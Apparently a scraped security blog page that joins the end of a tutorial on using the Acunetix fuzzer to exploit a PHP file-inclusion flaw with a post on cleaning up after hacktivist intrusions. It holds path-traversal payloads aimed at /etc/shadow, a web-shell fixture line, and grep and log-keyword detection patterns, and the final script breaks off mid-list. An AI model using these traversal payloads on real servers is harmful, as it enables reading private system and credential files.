<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept: */*</span><span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; text-align: -webkit-auto; vertical-align: baseline;"><span style="font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;">Therefore, to exploit the LFI the URL http://lfi.dc/lfi.php?pag= is used, where "pag" is the vulnerable parameter. The User-Agent value was changed only to show that headers can be changed or added without any problems.</span></span></span><br />
<div class="separator" style="clear: both; text-align: -webkit-auto;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-f-R968w0H-4/Tvt4jit1POI/AAAAAAAAAR8/OLxNEVaYZG4/s1600/ScreenHunter_01+Dec.+28+18.13.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="http://1.bp.blogspot.com/-f-R968w0H-4/Tvt4jit1POI/AAAAAAAAAR8/OLxNEVaYZG4/s400/ScreenHunter_01+Dec.+28+18.13.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline;"><span style="font-family: Arial;"><br class="kix-line-break" /></span></span><span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Creating and configuring the Generators</span></div>
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" />As this is a fuzzer, it naturally generates strings, integers, repeated characters and so on, but, as stated above, we will not run a scan or a conventional fuzzing session; instead we give the generators a new role. We first need to create two generators; more complex attacks will of course require more.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Character repeater and File generator</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As its name implies, the Character repeater repeats a character or string as many times as we want. Let's fill in the fields to create it; use intuitive names for each generator, because when you have several, remembering what each one does can be tricky. The default name generated by Acunetix is Gen_N, where N is a sequential number.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Name: dotslash => Intuitive name</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Character / String: ../../ => If you do not know why we are using the string "../../", I suggest you read the LFI reference.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Initial count: 1 => The process starts with one copy of the string ../../</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Final count: 2 => Maximum number of repetitions of the string ../../</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Increment: 1 => Step by which the repetition count grows</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Encoding: None</span><br />
<b style="background-color: white; text-align: -webkit-auto;"><span style="font-family: Arial; font-size: 15px; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This generator was set up for a classic LFI attack, so the Initial count field must be configured according to the number of "dotslash" sequences needed to exploit the bug. There is no need to encode the string in this case, so the Encoding field is set to None; Base64 and URL encoding are good options for evading possible filters. The second generator (File generator) reads a txt or xml file line by line, so we will feed it a list of filenames that probably exist on the attacked server. </span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">A simple way to build this list is to run the command below on several Linux flavors with many applications installed, such as Apache, MySQL, WordPress, Cacti, Nagios, Oracle and others.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">find / -type f > wordlist.txt</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The wordlists were then concatenated and duplicate lines removed; additionally, the leading "/" was stripped, because the string "../../" is prepended.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Completing the fields of this generator:</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Name: filenames_wordlist => Intuitive name </span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Filename: wordlist.txt => Wordlist name</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Filetype: txt => Wordlist extension</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Encoding: none => Not needed this time</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-z3Uugu37FGM/Tvt7amO0YXI/AAAAAAAAASI/kqgGfc3WoI4/s400/ScreenHunter_02+Dec.+28+18.25.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-z3Uugu37FGM/Tvt7amO0YXI/AAAAAAAAASI/kqgGfc3WoI4/s320/ScreenHunter_02+Dec.+28+18.25.jpg" width="280" /></a></div>
<div>
<span id="internal-source-marker_0.6442053494974971"></span><br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span id="internal-source-marker_0.6442053494974971"><span style="font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;"><br /></span></span></span></div>
<span id="internal-source-marker_0.6442053494974971">
<span style="background-color: white;"><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After both generators have been created and configured, add them to the HTTP request:</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Position the cursor just after pag=, select the dotslash generator and click Insert Into Request; repeat the process for filenames_wordlist.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The result should be something like this:</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">GET http://lfi.dc/lfi.php?pag=${dotslash}${filenames_wordlist} HTTP/1.1</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/4.0 (DcLabs)</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept: */*</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Before starting, note that filters exist to keep only the relevant results of the attack in the report; they are created under Fuzzer Filters. Acunetix ships with two filters by default, Include Internal Server Error and Invalid username / password combination; the second one is not needed for the LFI case, so just select it and delete it.</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Creating and configuring filters:</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Rule Description: Failed to open => Intuitive name for the filter<br class="kix-line-break" />Rule type: Exclusion => If the response matches the rule, the request is removed from the report</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Apply to: Response => Where the rule is matched; in this case it looks for the string in every response sent by the server.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Regular Expression: failed to open stream => This field holds the string that is matched against the server's response; matching requests are removed from the final report. I chose the string "failed to open stream" because it is the generic PHP error when a file is not found, cannot be accessed for permission reasons or cannot be read for any other reason:</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Permission error:</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: include(../../../etc/shadow) [</span><a href="http://172.28.8.23/function.include" style="font-weight: bold;"><span style="color: black; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">function.include</span></a><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]: </span><span style="color: red; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">failed to open stream</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Permission denied</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/var/www/t.php</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> on line </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">6</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: include() [</span><a href="http://172.28.8.23/function.include" style="font-weight: bold;"><span style="color: black; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">function.include</span></a><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]: Failed opening '../../../etc/shadow' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/var/www/t.php</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> on line </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">6</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">File not found:</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: include(../../../etc/dclabs) [</span><a href="http://172.28.8.23/function.include" style="font-weight: bold;"><span style="color: black; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">function.include</span></a><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]: </span><span style="color: red; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">failed to open stream</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">No such file or directory</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/var/www/t.php</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> on line </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">6</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: include() [</span><a href="http://172.28.8.23/function.include" style="font-weight: bold;"><span style="color: black; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">function.include</span></a><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]: Failed opening '../../../etc/dclabs' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/var/www/t.php</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> on line </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">6</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">(image 4)</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Therefore, many possibilities are filtered out with a single rule. Once done, click Add.<br class="kix-line-break" />If you need to change the rule, select it and click Update.</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Remember that this rule handles a generic PHP error. You will probably run into code where the error is handled by the programmer; in those cases your filter must be adjusted to the error message returned by the application.</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Ok, now just click Start and reap the files found on the target server.</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">There is another trick that I will show in the next post. I decided to split this into two parts so that the article does not become tiring.</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The HTTP Fuzzer is part of the free version of Acunetix.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I also made a video showing the tool running with a smaller wordlist: http://youtu.be/z357C_8H3Mc</span><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The next step, in addition to Part 2, is to write code that does this same job integrated with Metasploit.</span><br /><br /><span style="font-family: Arial, Helvetica, sans-serif;">LFI reference</span> -
<a href="http://hakipedia.com/index.php/Local_File_Inclusion">http://hakipedia.com/index.php/Local_File_Inclusion</a><br /><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Any questions: #dclabs @ freenode</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Twitter: @crashbrz</span></span><span style="background-color: white; font-family: Arial; font-size: 15px; white-space: pre-wrap;">Thanks to all for the English revision
</span><br class="kix-line-break" style="background-color: white; font-family: Arial; font-size: 15px; white-space: pre-wrap;" /><span style="background-color: white; font-family: Arial; font-size: 15px; white-space: pre-wrap;">Cya folks!</span>
</span></div>
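The "failed to open stream" string the fuzzer filters out is also the defender's signal: the same PHP warnings land in the server's error log. The following Python script is an added example, not part of the original post; it parses warnings in the shape quoted above, resolves each include path against the including script (an assumption about how the '.' include_path entry resolves) and reports targets outside the document root. The log lines are constructed.

```python
"""Turn PHP include() warnings into a traversal report (added example)."""
import re
from collections import Counter
from posixpath import dirname, join, normpath

# Warning shape as quoted in the post: the first warning per failed include()
# carries the OS reason after "failed to open stream:", followed by the
# including script and line number.
STREAM_RE = re.compile(
    r"include\((?P<path>[^)]*)\)(?: \[function\.include\])?: "
    r"failed to open stream: (?P<reason>.+?) in (?P<script>\S+) on line (?P<line>\d+)"
)

# Constructed sample error-log lines in the shape shown in the post.
SAMPLE_LOG = """\
Warning: include(../../../etc/shadow) [function.include]: failed to open stream: Permission denied in /var/www/t.php on line 6
Warning: include() [function.include]: Failed opening '../../../etc/shadow' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/t.php on line 6
Warning: include(../../../etc/dclabs) [function.include]: failed to open stream: No such file or directory in /var/www/t.php on line 6
Warning: include() [function.include]: Failed opening '../../../etc/dclabs' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/t.php on line 6
Warning: include(../../../../../../etc/shadow) [function.include]: failed to open stream: Permission denied in /var/www/t.php on line 6
Warning: include(pages/home.php) [function.include]: failed to open stream: No such file or directory in /var/www/t.php on line 6
"""


def parse_stream_warnings(lines):
    """One event per 'failed to open stream' warning. The companion
    'Failed opening ... for inclusion' warning adds nothing and is skipped."""
    events = []
    for line in lines:
        m = STREAM_RE.search(line)
        if m:
            ev = m.groupdict()
            ev["line"] = int(ev["line"])
            events.append(ev)
    return events


def resolve_target(script, path):
    """Absolute path PHP tried to open. Assumption: a relative include resolves
    against the including script's directory (the '.' entry of include_path)."""
    if path.startswith("/"):
        return normpath(path)
    return normpath(join(dirname(script), path))


def traversal_report(lines, docroot="/var/www"):
    """Group failed includes by resolved target outside the document root.
    'Permission denied' proves the file exists; 'No such file or directory'
    proves it does not. A traversal that succeeds leaves no warning at all,
    so the error log only ever shows the misses, never the hits."""
    root = normpath(docroot) + "/"
    report = {}
    for ev in parse_stream_warnings(lines):
        target = resolve_target(ev["script"], ev["path"])
        if target.startswith(root):
            continue  # stayed inside the web root: not traversal
        entry = report.setdefault(
            target, {"exists": False, "attempts": 0, "reasons": Counter()})
        entry["attempts"] += 1
        entry["reasons"][ev["reason"]] += 1
        if ev["reason"] == "Permission denied":
            entry["exists"] = True
    return report


if __name__ == "__main__":
    for target, info in traversal_report(SAMPLE_LOG.splitlines()).items():
        print(target, info)
```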
<div>
<span style="background-color: white; font-family: Arial; font-size: 15px; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://3.gvt0.com/vi/z357C_8H3Mc/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/z357C_8H3Mc&fs=1&source=uds" />
<param name="bgcolor" value="#FFFFFF" />
<embed width="320" height="266" src="http://www.youtube.com/v/z357C_8H3Mc&fs=1&source=uds" type="application/x-shockwave-flash"></embed></object></div>
<div>
<span style="background-color: white;"><span style="font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;"><br /></span></span></span><span style="background-color: #fafafa; color: #333333; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-5469895720005231962012-01-01T06:02:00.000-08:002012-01-01T08:34:17.333-08:00How to survive attacks by "hacktivists" and the web defacers on duty<div style="text-align: left;">
In 2011 hacker activity received wide coverage and went from mere pranks by idle youngsters to "organized" actions with a libertarian political bent.
The groups that quickly gained prestige were Anonymous and LulzSec; a good part of the marketing around these groups' actions was handled by social networks, pastebin and YouTube. From there, new factions such as AnonymousBR, iPiratesGroup, LuLzSecBR, GreyHatBR, AntiSecBR and a few <a href="http://brainsniffer.blogspot.com/2011/12/mais-uma-previsao-de-seguranca-em-2012.html">web defacers</a> began to emerge in search of their 15 minutes of fame. Analyzing the published results, it is not hard to understand the reason for so much success. I identified simple mistakes such as weak passwords on the sites' administration panels (e.g. admin@domain/manager) and lots, really lots, of SQLi and Blind SQLi. Below I give some tips on how to survive after your infrastructure has been compromised and how to mitigate the flaws.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<a href="http://blog.alexos.com.br/wp-content/uploads/2011/12/Anonymous-Seguran%C3%A7a-Hackers-Hacktivistas.jpg"><img alt="" class="alignleft size-medium wp-image-2828" height="199" src="http://blog.alexos.com.br/wp-content/uploads/2011/12/Anonymous-Segurança-Hackers-Hacktivistas-300x199.jpg" title="Anonymous-Segurança-Hackers-Hacktivistas" width="300" /></a></div>
<br />
<div style="text-align: left;">
<span style="font-weight: bold;"><br /></span></div>
<strong></strong><br />
<div style="text-align: left;">
<strong style="font-weight: bold;">1 - Web Backdoors</strong>
<br /><br /> Web shells<a href="http://www.darknet.org.uk/2007/03/a-collection-of-web-backdoors-shells-cmdasp-cmdjsp-jsp-reverse-php-backdoor/">[1]</a> <a href="http://code.google.com/p/weevely/">[2]</a> keep granting access to the compromised environment even after the flaws have been fixed. Studying the code of these tools makes their detection and removal easier.
In these cases an AV helps a lot, on Windows as well as on Linux, but be very careful, because not every AV is able to detect even well-known web backdoors (e.g. Symantec). One way to validate the scan is to search manually:
<em>On Linux</em></div>
<strong>
</strong><br />
<blockquote>
<div style="text-align: left;">
grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" /var/www/
</div>
</blockquote>
<div style="text-align: left;">
<em>On Windows</em>
Use the search tool to look for the words listed above.</div>
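The manual search above flags every file that calls one of the listed functions, which on a real CMS tree produces a lot of noise (legitimate code calls fopen and mkdir too). The script below is an added example, not part of the original post: it applies the same function list and extensions as the grep one-liner, but ranks files by how many distinct dangerous functions they call, so a single upload that combines base64_decode and system stands out. The sample web root it builds is a constructed fixture, not a real site.

```python
import os
import re
import tempfile
from pathlib import Path

# Same function list and "name(" call pattern as the grep one-liner above;
# the added \b avoids matching e.g. "mysystem(".
DANGEROUS = ("passthru", "shell_exec", "system", "phpinfo", "base64_decode",
             "chmod", "mkdir", "fopen", "fclose", "readfile")
CALL_RE = re.compile(r"\b(%s) *\(" % "|".join(DANGEROUS))
EXTENSIONS = {".php", ".txt", ".asp"}   # --include=*.{php,txt,asp}


def scan_file(path):
    """Return the set of dangerous function names called in one file."""
    try:
        text = Path(path).read_text(errors="replace")
    except OSError:
        return set()
    return set(CALL_RE.findall(text))


def find_suspicious_files(root):
    """Walk root like grep -R; return {relative path: sorted hits}, worst first."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if Path(name).suffix.lower() not in EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                results[os.path.relpath(full, root)] = sorted(hits)
    # Files calling many distinct dangerous functions go to the top of the
    # triage list; a lone fopen( in a legitimate CMS file ranks low.
    return dict(sorted(results.items(), key=lambda kv: -len(kv[1])))


def build_sample_tree():
    """Constructed sample web root (hypothetical): a benign page and a suspicious upload."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.php").write_text("<?php echo 'hello'; ?>")
    (root / "uploads").mkdir()
    (root / "uploads" / "img.php").write_text(
        "<?php system(base64_decode($_GET['c'])); ?>")   # detection fixture
    (root / "style.css").write_text("system(")            # wrong extension, skipped
    return str(root)


if __name__ == "__main__":
    for path, hits in find_suspicious_files(build_sample_tree()).items():
        print(path, ", ".join(hits))
```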
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<strong>2 - Análise do alvo</strong>
<br /><br /> After the incident it is very important to understand which vulnerabilities allowed the intrusion. Vulnerability analysis tools such as <a href="http://www.nessus.org/">Nessus</a>, <a href="http://arachni.segfault.gr/">Arachni</a>, <a href="http://www.uniscan.com.br/">Uniscan</a> and <a href="http://www.acunetix.com/">Acunetix</a> are of fundamental importance, since they point out the likely entry points and make it easier to build the mitigation plan.
Auditing the database is extremely important as well, since bogus entries (e.g. ghost accounts) and other leftovers from the attack may have been added.
</div>
<br />
<div style="text-align: left;">
<span style="font-weight: bold;"><br /></span></div>
<strong></strong><br />
<div style="text-align: left;">
<strong><strong>3 - Extra protection and monitoring</strong>
</strong><br />Adding an extra layer of security makes attack attempts harder by denying scans for vulnerabilities and open ports. Do not leave this responsibility solely to the perimeter protection tool (e.g. IPS): because it relies on <a href="http://en.wikipedia.org/wiki/Pattern_matching">pattern matching</a>, not every attack will be blocked, and be very careful with false positives, since an application with a bug in its code can make the IPS treat every request as malicious. Auditing all the alerts, often without blocking them, is the most advisable approach.
<a href="http://www.ossec.net/">Ossec</a> together with <a href="http://www.splunk.com/product">Splunk</a>, <a href="http://blog.alexos.com.br/?p=2717">Portsentry</a>, <a href="http://www.la-samhna.de/samhain/">Samhain</a> and <a href="http://www.modsecurity.org/">ModSecurity</a> are tools that help a lot with this task. Another seldom-used habit is log analysis: a simple search for words such as <em>Nikto, Havij, perl, whitehat, Uniscan, acunetix, fuck, scanner, timthumb, pma, phpmyadmin</em> in the Apache and IIS logs is enough to identify some attack attempts.</div>
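As an added example (not code from the original post), here is the keyword search above turned into a small Apache log triage script: it parses combined-format access log lines, checks the request line and User-Agent against the same word list, and counts hits per source IP so a host that probes several paths in a row stands out. The log lines are constructed samples in the 203.0.113.0/24 documentation range; IIS W3C logs use a different layout and would need their own parser.

```python
import re
from collections import Counter

# Keyword list from the post; matched case-insensitively in request and User-Agent.
KEYWORDS = ("nikto", "havij", "perl", "whitehat", "uniscan", "acunetix",
            "fuck", "scanner", "timthumb", "pma", "phpmyadmin")
KEYWORD_RE = re.compile("|".join(map(re.escape, KEYWORDS)), re.IGNORECASE)

# Apache combined format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')


def parse_line(line):
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_line(line):
    """Return (ip, request, matched keyword) if the line looks like a scan, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    for field in ("request", "agent"):
        m = KEYWORD_RE.search(rec[field])
        if m:
            return (rec["ip"], rec["request"], m.group(0).lower())
    return None


def summarise(lines):
    """Count flagged requests per source IP so persistent scanners stand out."""
    hits = [h for h in map(flag_line, lines) if h]
    return Counter(ip for ip, _, _ in hits), hits


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2011:10:00:01 -0200] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2011:10:00:02 -0200] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2011:10:00:03 -0200] "GET /pma/ HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2011:10:00:04 -0200] "GET /cgi-bin/test HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Nikto/2.1.5)"',
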